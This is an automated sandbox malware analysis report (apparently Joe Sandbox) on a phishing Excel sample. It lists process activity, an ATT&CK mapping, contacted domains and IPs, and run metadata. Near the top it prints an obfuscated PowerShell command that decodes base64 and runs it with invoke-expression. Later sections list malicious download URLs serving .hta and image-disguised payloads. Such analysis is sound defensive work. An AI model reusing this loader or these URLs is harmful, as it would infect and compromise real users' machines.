Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" $claustrophobe = 'jgf1dg9zyxzlid0gj2h0dhbzoi8vcmvzlmnsb3vkaw5hcnkuy29tl2r5dgzsddyxbi9pbwfnzs91cgxvywqvdje3mzmxmzq5ndcvymtschlzzxlldxq0aw1wdzuwbjeuanbnicc7jgnozw1vdhjvcglzbsa9ie5ldy1pymply3qgu3lzdgvtlk5ldc5xzwjdbgllbnq7jhf1zwvmid0gjgnozw1vdhjvcglzbs5eb3dubg9hzerhdgeojgf1dg9zyxzlktskchvua2xpbmcgpsbbu3lzdgvtllrlehqurw5jb2rpbmddojpvvey4lkdldfn0cmluzygkcxvlzwypoyr0dwjlcmn1bg9wag9iawegpsanpdxcqvnfnjrfu1rbulq+pic7jgzlbxrvy291bg9tyia9icc8pejbu0u2nf9ftkq+pic7jhvudghyawz0esa9icrwdw5rbgluzy5jbmrlee9mkcr0dwjlcmn1bg9wag9iawepoyroyw1tyw0gpsakchvua2xpbmcusw5kzxhpzigkzmvtdg9jb3vsb21iktskdw50ahjpznr5ic1nzsawic1hbmqgjghhbw1hbsatz3qgjhvudghyawz0etskdw50ahjpznr5ics9icr0dwjlcmn1bg9wag9iaweutgvuz3rooyrwzxryb2rvbgxhcia9icroyw1tyw0glsakdw50ahjpznr5oyrkyxn5yxrpzgflid0gjhb1bmtsaw5nlln1ynn0cmluzygkdw50ahjpznr5lcakcgv0cm9kb2xsyxipoyrkawdpdgfsaxnpbmcgpsatam9pbiaojgrhc3lhdglkywuuvg9dagfyqxjyyxkoksb8iezvckvhy2gtt2jqzwn0ihsgjf8gfslblteuli0ojgrhc3lhdglkywuutgvuz3rokv07jhvuawrlywxpemvkid0gw1n5c3rlbs5db252zxj0xto6rnjvbujhc2u2nfn0cmluzygkzglnaxrhbglzaw5nktsky29tbwvuzgluzya9ifttexn0zw0uumvmbgvjdglvbi5bc3nlbwjsev06okxvywqojhvuawrlywxpemvkktskamfwb25py2fzid0gw2rubglilklplkhvbwvdlkdlde1ldghvzcgnvkfjjyk7jgphcg9uawnhcy5jbnzva2uojg51bgwsieaojzavy3vwreuvci9lzs5ldhnhcc8vonnwdhrojywgjyrjb25mawrlbnrpywxpdhknlcanjgnvbmzpzgvudglhbgl0escsiccky29uzmlkzw50awfsaxr5jywgj0nhc1bvbccsiccky29uzmlkzw50awfsaxr5jywgjyrjb25mawrlbnrpywxpdhknlccky29uzmlkzw50awfsaxr5jywnjgnvbmzpzgvudglhbgl0escsjyrjb25mawrlbnrpywxpdhknlccky29uzmlkzw50awfsaxr5jywnjgnvbmzpzgvudglhbgl0escsjzenlccky29uzmlkzw50awfsaxr5jykpow==';$uninverted = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($claustrophobe));invoke-expression $uninverted	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.Cmdlets\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.Cmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.PolicyManager\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.PolicyManager.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_64\Microsoft.Security.ApplicationId.PolicyManagement.PolicyEngineApi.Interop\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.PolicyEngineApi.Interop.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management\1.0.0.0__31bf3856ad364e35\Microsoft.BackgroundIntelligentTransfer.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Windows.Diagnosis.TroubleshootingPack\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.TroubleshootingPack.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_64\Microsoft.Windows.Diagnosis.SDEngine\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.SDEngine.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior

Source: C:\Windows\System32\mshta.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	121 Scripting	Valid Accounts	121 Command and Scripting Interpreter	121 Scripting	11 Process Injection	1 Masquerading	OS Credential Dumping	1 Process Discovery	Remote Services	1 Email Collection	1 Web Service	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	23 Exploitation for Client Execution	1 DLL Side-Loading	1 DLL Side-Loading	21 Virtualization/Sandbox Evasion	LSASS Memory	21 Virtualization/Sandbox Evasion	Remote Desktop Protocol	1 Archive Collected Data	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	3 PowerShell	Logon Script (Windows)	Logon Script (Windows)	11 Process Injection	Security Account Manager	1 Application Window Discovery	SMB/Windows Admin Shares	1 Clipboard Data	3 Ingress Tool Transfer	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	11 Obfuscated Files or Information	NTDS	1 Remote System Discovery	Distributed Component Object Model	Input Capture	2 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Install Root Certificate	LSA Secrets	1 File and Directory Discovery	SSH	Keylogging	13 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	14 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
SOA USD67,353.35.xla.xlsx	16%	ReversingLabs
SOA USD67,353.35.xla.xlsx	100%	Joe Sandbox ML

Source	Detection	Scanner	Label
http://107.172.44.175/73/simplecookiebiscutwithsweetnessforentiretime.tIF	0%	Avira URL Cloud	safe
http://107.172.44.175/73/ycc/goodthhingswithgreatcapitalthingsforgreatnewswithgoodmorng.htaept-C:	0%	Avira URL Cloud	safe
http://107.172.44.175/73/simplecookiebiscutwithsweetnessforentiretime.tIFC:	0%	Avira URL Cloud	safe
http://107.172.44.175/73/ycc/goodthhingswithgreatcapitalthingsforgreatnewswithgoodmorng.hta...M	0%	Avira URL Cloud	safe
http://107.172.44.175/73/ycc/goodthhingswithgreatcapitalthingsforgreatnewswithgoodmorng.htaj5	0%	Avira URL Cloud	safe
http://crl.entr	0%	Avira URL Cloud	safe
http://107.172.44.175/73/ycc/goodthhingswithgreatcapitalthingsforgreatnewswithgoodmorng.htahttp://10	0%	Avira URL Cloud	safe
https://jktc.pro/yyKnY4?&blow=cold&peacoat	0%	Avira URL Cloud	safe
http://107.172.44.175/73/ycc/goodthhingswithgreatcapitalthingsforgreatnewswithgoodmorng.htap5	0%	Avira URL Cloud	safe
https://jktc.pro/0M	0%	Avira URL Cloud	safe
http://107.172.44.175/73/simplecookiebiscutwithsweetnessforentiretime.tIFp	0%	Avira URL Cloud	safe
https://jktc.pro/.	0%	Avira URL Cloud	safe
https://jktc.pro/yyKnY4?&blow=cold&peacoat7	0%	Avira URL Cloud	safe
http://107.172.44.175/	0%	Avira URL Cloud	safe
https://jktc.pro/	0%	Avira URL Cloud	safe
http://107.172.44.175/73/ycc/goodthhingswithgreatcapitalthingsforgreatnewswithgoodmorng.hta6	0%	Avira URL Cloud	safe
http://107.172.44.175/73/ycc/goodthhingswithgreatcapitalthingsforgreatnewswithgoodmorng.hta	0%	Avira URL Cloud	safe
https://jktc.pro/yyKnY4?&blow=cold&peacoat4	0%	Avira URL Cloud	safe
http://107.172.44.175/73/ycc/goodthhingswithgreatcapitalthingsforgreatnewswithgoodmorng.hta5	0%	Avira URL Cloud	safe
http://107.172.44.175/73/simplec	0%	Avira URL Cloud	safe
http://107.172.44.175/73/simplecookiebiscutwithsweetnessforentiretime.tIF9	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
paste.ee	188.114.97.6	true	false	high
jktc.pro	172.67.163.184	true	false	high
res.cloudinary.com	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://jktc.pro/yyKnY4?&blow=cold&peacoat	false	Avira URL Cloud: safe	unknown
http://107.172.44.175/73/simplecookiebiscutwithsweetnessforentiretime.tIF	true	Avira URL Cloud: safe	unknown
http://107.172.44.175/73/ycc/goodthhingswithgreatcapitalthingsforgreatnewswithgoodmorng.hta	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://nuget.org/NuGet.exe	powershell.exe, 00000007.00000002.509994194.0000000012401000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.entrust.net/server1.crl0	mshta.exe, 00000004.00000003.488493466.00000000033C8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.491143441.00000000033C9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.491628179.00000000033C9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.486832830.00000000033C7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.511162512.000000001C900000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.511162512.000000001C941000.00000004.00000020.00020000.00000000.sdmp	false		high
https://jktc.pro/0M	mshta.exe, 00000004.00000003.491168504.0000000000528000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.491456318.0000000000528000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.485939637.0000000000528000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://ocsp.entrust.net03	mshta.exe, 00000004.00000003.488493466.00000000033C8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.491143441.00000000033C9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.491628179.00000000033C9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.486832830.00000000033C7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.511162512.000000001C900000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.511162512.000000001C941000.00000004.00000020.00020000.00000000.sdmp	false		high
https://res.cloudinary.com/dytflt61n/image/upload/v1733134947/bklpyseyeut4impw50n1.jpgX	powershell.exe, 0000000C.00000002.557237149.00000000025B1000.00000004.00000800.00020000.00000000.sdmp	false		high
http://107.172.44.175/73/ycc/goodthhingswithgreatcapitalthingsforgreatnewswithgoodmorng.htaept-C:	mshta.exe, 00000004.00000003.485939637.0000000000565000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.491168504.0000000000565000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.491456318.0000000000565000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://contoso.com/License	powershell.exe, 00000007.00000002.509994194.0000000012401000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contoso.com/Icon	powershell.exe, 00000007.00000002.509994194.0000000012401000.00000004.00000800.00020000.00000000.sdmp	false		high
http://107.172.44.175/73/simplecookiebiscutwithsweetnessforentiretime.tIFC:	powershell.exe, 00000007.00000002.511162512.000000001C8D0000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0	mshta.exe, 00000004.00000003.488493466.00000000033C8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.491143441.00000000033C9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.491628179.00000000033C9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.486832830.00000000033C7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.511162512.000000001C941000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.diginotar.nl/cps/pkioverheid0	mshta.exe, 00000004.00000003.488493466.00000000033C8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.491143441.00000000033C9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.491628179.00000000033C9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.486832830.00000000033C7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.511162512.000000001C941000.00000004.00000020.00020000.00000000.sdmp	false		high
http://107.172.44.175/73/ycc/goodthhingswithgreatcapitalthingsforgreatnewswithgoodmorng.htap5	mshta.exe, 00000004.00000003.486726361.0000000003439000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.491655612.0000000003439000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://go.micros	powershell.exe, 00000007.00000002.506734077.00000000028F4000.00000004.00000800.00020000.00000000.sdmp	false		high
http://107.172.44.175/73/ycc/goodthhingswithgreatcapitalthingsforgreatnewswithgoodmorng.htahttp://10	mshta.exe, 00000004.00000003.487927328.00000000028B5000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://107.172.44.175/73/ycc/goodthhingswithgreatcapitalthingsforgreatnewswithgoodmorng.htaj5	mshta.exe, 00000004.00000003.486726361.0000000003439000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.491655612.0000000003439000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://crl.entr	powershell.exe, 0000000C.00000002.557064924.00000000022C3000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://107.172.44.175/73/ycc/goodthhingswithgreatcapitalthingsforgreatnewswithgoodmorng.hta...M	mshta.exe, 00000004.00000003.485939637.0000000000512000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://107.172.44.175/73/simplecookiebiscutwithsweetnessforentiretime.tIFp	powershell.exe, 00000007.00000002.506734077.0000000002ECF000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://jktc.pro/yyKnY4?&blow=cold&peacoat7	mshta.exe, 00000004.00000002.491456318.00000000004EA000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0	mshta.exe, 00000004.00000003.488493466.00000000033C8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.491143441.00000000033C9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.491628179.00000000033C9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.486832830.00000000033C7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.511162512.000000001C941000.00000004.00000020.00020000.00000000.sdmp	false		high
https://res.cloudinary.com	powershell.exe, 0000000C.00000002.557237149.00000000025B1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://jktc.pro/	mshta.exe, 00000004.00000003.491143441.00000000033F6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.486832830.00000000033F6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.491168504.0000000000528000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.491456318.0000000000528000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.488493466.00000000033F6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.491628179.00000000033F6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.485939637.0000000000528000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://107.172.44.175/73/ycc/goodthhingswithgreatcapitalthingsforgreatnewswithgoodmorng.hta6	mshta.exe, 00000004.00000003.491143441.00000000033F6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.486832830.00000000033F6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.488493466.00000000033F6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.491628179.00000000033F6000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://107.172.44.175/	mshta.exe, 00000004.00000003.488493466.0000000003417000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.491628179.0000000003417000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.486832830.0000000003417000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.491143441.0000000003417000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://107.172.44.175/73/simplec	powershell.exe, 00000007.00000002.506734077.0000000002ECF000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://107.172.44.175/73/ycc/goodthhingswithgreatcapitalthingsforgreatnewswithgoodmorng.hta5	mshta.exe, 00000004.00000003.491143441.00000000033F6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.486832830.00000000033F6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.488493466.00000000033F6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.491628179.00000000033F6000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://jktc.pro/.	mshta.exe, 00000004.00000003.488493466.00000000033C8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.491143441.00000000033C9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.491628179.00000000033C9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.486832830.00000000033C7000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://contoso.com/	powershell.exe, 00000007.00000002.509994194.0000000012401000.00000004.00000800.00020000.00000000.sdmp	false		high
https://jktc.pro/yyKnY4?&blow=cold&peacoat4	mshta.exe, 00000004.00000002.491456318.00000000004EA000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://nuget.org/nuget.exe	powershell.exe, 00000007.00000002.509994194.0000000012401000.00000004.00000800.00020000.00000000.sdmp	false		high
http://ocsp.entrust.net0D	mshta.exe, 00000004.00000003.488493466.00000000033C8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.491143441.00000000033C9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.491628179.00000000033C9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.486832830.00000000033C7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.511162512.000000001C941000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.557064924.00000000022C3000.00000004.00000020.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 00000007.00000002.506734077.00000000023D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.557237149.00000000023B1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://secure.comodo.com/CPS0	mshta.exe, 00000004.00000003.488493466.00000000033C8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.491143441.00000000033C9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.491628179.00000000033C9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.486832830.00000000033C7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.511162512.000000001C8F8000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.511162512.000000001C941000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.557064924.000000000226E000.00000004.00000020.00020000.00000000.sdmp	false		high
http://107.172.44.175/73/simplecookiebiscutwithsweetnessforentiretime.tIF9	powershell.exe, 00000007.00000002.511162512.000000001C8D0000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://crl.entrust.net/2048ca.crl0	mshta.exe, 00000004.00000003.488493466.00000000033C8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.491143441.00000000033C9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.491628179.00000000033C9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.486832830.00000000033C7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.511162512.000000001C941000.00000004.00000020.00020000.00000000.sdmp	false		high
https://res.cloudinary.com/dytflt61n/image/upload/v1733134947/bklpyseyeut4impw50n1.jpg	powershell.exe, 0000000C.00000002.557237149.00000000025B1000.00000004.00000800.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
172.67.163.184	jktc.pro	United States	13335	CLOUDFLARENETUS	false
107.172.44.175	unknown	United States	36352	AS-COLOCROSSINGUS	true
104.21.34.183	unknown	United States	13335	CLOUDFLARENETUS	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1574072
Start date and time:	2024-12-12 21:41:30 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 6m 22s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	defaultwindowsofficecookbook.jbs
Analysis system description:	Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of analysed new started processes analysed:	16
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled GSI enabled (VBA) AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	SOA USD67,353.35.xla.xlsx
Detection:	MAL
Classification:	mal100.phis.troj.expl.evad.winXLSX@15/25@12/3
EGA Information:	Successful, ratio: 50%
HCA Information:	Successful, ratio: 100% Number of executed functions: 9 Number of non-executed functions: 3
Cookbook Comments:	Found application associated with file extension: .xlsx Changed system and user locale, location and keyboard layout to French - France Found Word or Excel or PowerPoint or XPS Viewer Attach to Office via COM Active ActiveX Object Active ActiveX Object Active ActiveX Object Active ActiveX Object Scroll down Close Viewer

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, conhost.exe
Excluded IPs from analysis (whitelisted): 23.195.60.41, 104.17.201.1, 104.17.202.1
Excluded domains from analysis (whitelisted): ion.cloudinary.com.edgekey.net, e1315.dsca.akamaiedge.net, resc.cloudinary.com.cdn.cloudflare.net
Execution Graph export aborted for target mshta.exe, PID 3916 because there are no executed function
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: SOA USD67,353.35.xla.xlsx

Simulations

Behavior and APIs

Time	Type	Description
15:43:19	API Interceptor	72x Sleep call for process: mshta.exe modified
15:43:24	API Interceptor	126x Sleep call for process: powershell.exe modified
15:43:33	API Interceptor	6x Sleep call for process: wscript.exe modified

LLM Input / Output

Input	Output
URL: Screenshot id: 3 Model: Joe Sandbox AI	{ "contains_trigger_text": false, "trigger_text": "unknown", "prominent_button_name": "unknown", "text_input_field_labels": "unknown", "pdf_icon_visible": false, "has_visible_captcha": false, "has_urgent_text": false, "has_visible_qrcode": false, "contains_chinese_text": false }

URL: Screenshot id: 1 Model: Joe Sandbox AI	{ "contains_trigger_text": false, "trigger_text": "unknown", "prominent_button_name": "unknown", "text_input_field_labels": "unknown", "pdf_icon_visible": false, "has_visible_captcha": false, "has_urgent_text": false, "has_visible_qrcode": false, "contains_chinese_text": false }

URL: Screenshot id: 4 Model: Joe Sandbox AI	{ "contains_trigger_text": false, "trigger_text": "unknown", "prominent_button_name": "unknown", "text_input_field_labels": "unknown", "pdf_icon_visible": false, "has_visible_captcha": false, "has_urgent_text": false, "has_visible_qrcode": false, "contains_chinese_text": false }

URL: Screenshot id: 10 Model: Joe Sandbox AI	{ "contains_trigger_text": false, "trigger_text": "unknown", "prominent_button_name": "unknown", "text_input_field_labels": "unknown", "pdf_icon_visible": false, "has_visible_captcha": false, "has_urgent_text": false, "has_visible_qrcode": false, "contains_chinese_text": false }

URL: Screenshot id: 7 Model: Joe Sandbox AI	{ "contains_trigger_text": true, "trigger_text": "Antalya Konyaalt Yeni Bina", "prominent_button_name": "unknown", "text_input_field_labels": "unknown", "pdf_icon_visible": false, "has_visible_captcha": false, "has_urgent_text": false, "has_visible_qrcode": false, "contains_chinese_text": false }

URL: Screenshot id: 2 Model: Joe Sandbox AI	{ "contains_trigger_text": false, "trigger_text": "unknown", "prominent_button_name": "unknown", "text_input_field_labels": "unknown", "pdf_icon_visible": false, "has_visible_captcha": false, "has_urgent_text": false, "has_visible_qrcode": false, "contains_chinese_text": false }

URL: Screenshot id: 6 Model: Joe Sandbox AI	{ "contains_trigger_text": false, "trigger_text": "unknown", "prominent_button_name": "unknown", "text_input_field_labels": "unknown", "pdf_icon_visible": false, "has_visible_captcha": false, "has_urgent_text": false, "has_visible_qrcode": false, "contains_chinese_text": false }

URL: Screenshot id: 8 Model: Joe Sandbox AI	{ "contains_trigger_text": true, "trigger_text": "KATALAMA HAVLU PEETE 12*200", "prominent_button_name": "unknown", "text_input_field_labels": "unknown", "pdf_icon_visible": false, "has_visible_captcha": false, "has_urgent_text": false, "has_visible_qrcode": false, "contains_chinese_text": false }

URL: Screenshot id: 9 Model: Joe Sandbox AI	{ "contains_trigger_text": false, "trigger_text": "unknown", "prominent_button_name": "unknown", "text_input_field_labels": "unknown", "pdf_icon_visible": false, "has_visible_captcha": false, "has_urgent_text": false, "has_visible_qrcode": false, "contains_chinese_text": false }

URL: Screenshot id: 1 Model: Joe Sandbox AI	{ "brands": "unknown" }
	{ "brands": "unknown" }
URL: Screenshot id: 2 Model: Joe Sandbox AI	{ "brands": "unknown" }
	{ "brands": "unknown" }
URL: Screenshot id: 7 Model: Joe Sandbox AI	{ "brands": "unknown" }
	{ "brands": "unknown" }
URL: Screenshot id: 8 Model: Joe Sandbox AI	{ "brands": "unknown" }
	{ "brands": "unknown" }
URL: Screenshot id: 10 Model: Joe Sandbox AI	{ "brands": "unknown" }
	{ "brands": "unknown" }
URL: Screenshot id: 9 Model: Joe Sandbox AI	{ "brands": "unknown" }
	{ "brands": "unknown" }
